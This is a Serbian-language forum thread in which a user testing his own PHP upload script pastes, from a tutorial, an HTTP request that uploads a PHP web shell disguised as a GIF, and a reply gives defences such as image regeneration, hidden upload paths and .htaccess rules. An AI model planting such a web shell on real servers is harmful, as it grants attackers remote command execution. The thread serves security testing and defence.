[ username1987 @ 08.04.2011. 16:05 ] @
Prvo, bih želio da pozdravim sve. Zamolio bih da mi neko pomogne oko jednog problema. Želio bih da testiram sigurnost moje upload skripte napisane u PHP. I guglajući na netu,našao sam par odličnih tutorijala i upustava.
Trenutno čitam ovaj tutorial http://www.scanit.be/uploads/php-file-upload.pdf Skinuo sam ActivePerl verziju sa interneta ali ne mogu da podesim da namjestim i isprobam ove primjere.
Npr. kada ukucam ime fajla npr (perl upload3.pl) izlista mi skroz drugačiji rezultat nego kao što je u ovom tutorijalu.Neke skripte neće uopšte da mi pokrene.
Uzeću kao primjer ovaj 3ći po redu.
Evo koda koji bi trebao dobiti nakon što pokrenem skriptu u Perlu
Code:
POST /upload2.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155
--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/gif
<?php
system($_GET['command']);
?>
--xYzZY--
HTTP/1.1 200 OK
Date: Thu, 31 May 2007 14:02:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-pl6-gentoo
Content-Length: 59
Connection: close
Content-Type: text/html
<pre>File is valid, and was successfully uploaded.
</pre>


Ali ja dobijem ovo
http://img801.imageshack.us/i/perl.jpg/

Molio bih za pomoć i savjete. Hvala

[ username1987 @ 10.04.2011. 18:04 ] @
Molio bih moderatore da ovu temu prebace u PHP, možda će neko tamo znati odgovor.Hvala
[ ivan.a @ 25.05.2011. 06:21 ] @
Sudeći po ovoj poruci sa slike, meni izgleda kao da putanja nije podešena (do forme, slike ili skripte).

Ćitao sam ovaj .pdf. Nije loš.

Ako želiš da se zaštitiš od malicioznog koda u slici (popularno 1x1.gif) koristi GD ili Imagemagick bibiloteku za regenerisanje uploadovane slike, što će očistiti taj kod. Pored toga, proveravaš veličinu fajla, tip fajla... Najbolje je da korisnik nikada ne zna gde su uploadovane slike, tako da iste prikazuješ putem php skripte. Npr. ?slika=neka_slika.gif i jedino skripta "zna" gde se slika nalazi.

Još jedna moćna "barijera" protiv online predatora je .htaccess. Možeš zaštititi direktorijum sa slikama.

Code:
Options -Indexes
Options -ExecCGI 
AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .html